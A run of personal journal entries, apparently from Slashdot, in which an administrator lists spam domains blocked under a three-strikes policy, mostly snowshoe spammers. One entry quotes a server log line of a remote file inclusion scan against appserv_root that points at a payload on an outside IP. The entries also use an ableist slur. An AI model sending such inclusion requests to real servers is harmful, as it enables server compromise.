Journal Journal: Today's 3-strikes winner
Here's today's winner:
bluestyles.info
Snowshoe spammer.
Here's today's winner:
bluestyles.info
Snowshoe spammer.
Here's today's winners:
funtousa.info
smart-dns.net
Snowshoe spammer.
Here's today's winner:
net-ooinf.com
Here's today's list:
anaboll.com
dockeyel.com
coliza.com
adarabo.com
datergr.com
dumkarr.com
increun.com
circust.com
honeuk.com
dandele.com
ficeme.com
graftsm.com
troutia.com
tuciseas.com
All came from the same Class C, just like a typical snowshoe spammer would, so that's been blocked too.
Here's today's list:
graftsm.com
tuciseas.com
anaboll.com
coliza.com
troutia.com
Another snowshoe spammer, so the Class C is blocked too.
Here's today's winner:
iwuzborndizway.info
As if a domain name that retarded needed anything other than being blocked.
Here's today's list:
mktdns.com
ethreemail.com
Since the takedown of the Rustock botnet total spam volume has dropped but the snowshoe spammers have cranked back up. Here's today's list:
alsopagehim.com
doesnearher.com
evencitynow.com
kindcrabbuu.com
hereheadgo.com
homeopenbe.com
movecarfor.com
nearmetrolike.com
Since the shutdown of the Rustock botnet, total spam volume has dropped but the snowshoe spammers have cranked their operations back up. Here's today's list:
alsopagehim.com
doesnearher.com
evencitynow.com
hereheadgo.com
homeopenbe.com
movecarfor.com
nearmetrolike.com
pagedailybe.com
I've been encountering a lot of appserv_root scans using IP addresses in Turkey as the inclusion file:
2011/4/06 03:05:43 404 (URI not found) Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
/var/log/httpd/access_log GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1
The original requests are coming from Amazon's cloud services, and other "cloud" providers like cloud-ips.com, which doesn't seem to have a Website.
If you call Amazon's whois phone number for the Technical Contact, it's their legal department. They'll never answer, you have to email or fax your request.
I got Josh Odom's personal voicemail when I called the whois Tech # for cloud-ips.com. Left a message, we'll see if he calls back.
Here's today's list:
cheewecity.com
mebuyhead.com
canheopen.com
weshecar.com
ithavemetro.com
otwedaily.com
doforcrab.com
atlovefood.com
homeyoumuch.com
Snowshoe spammer, so the Class C is blocked too.
Here's today's winners:
gestiena.info
gonosynt.info
mifuelia.info
lydding.info
joleeti.info
odourat.info
excipli.info
plaforb.info
dinnywo.info
daytilt.info
sourcemediatwenty.info
sourcenowfifteen.info
sourcemedianineteen.info
sourcemediaeighteen.info
sourcebulletinfive.info
mediabulletintwelve.info
sourcebulletinseven.info
sourcebulletinsix.info
websourcethirteen.info
Another round of snowshoe spammers from 2 different Class C's, so they're blocked too.
Here's today's list:
aurelop.com
Snowshoe spammer, so the whole Class C is blocked too.
Here's today's winner:
cheapstingybargains.com
Here's today's list:
informationssource.info
biographicbuziness.com
More snowshoe spamming, with SMTP connections coming from several different Class C's.
Where there's a will, there's a relative.